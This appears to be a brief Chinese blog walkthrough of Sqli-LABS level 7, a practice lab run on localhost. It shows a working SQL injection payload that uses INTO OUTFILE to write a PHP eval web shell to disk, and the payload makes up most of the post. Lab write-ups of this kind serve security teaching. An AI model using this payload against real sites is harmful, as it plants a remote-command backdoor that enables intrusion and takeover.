Sqli-LABS通关笔录-7[文件写入函数Outfile]
该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用。
通过源代码我们很容易的写出了payload。倘若我们一个个去尝试的话,说实话,不容易。
http://127.0.0.1/sql/Less-7/index.php?id=1')) and 1=1--+
Payload:
http://127.0.0.1/sql/Less-7/index.php?id=1')) union select 1,'<?php eval($_POST[cmd])?>',3 into outfile 'H://zhenxishaonianshi.txt'--+
虽然提示了语法错误。但是我们看看。在H盘是真实的存在的。
THE END
By:珍惜少年时博客:http://www.cnblogs.com/xishaonian/
*-------------------------------------------*
浙公网安备 33010602011771号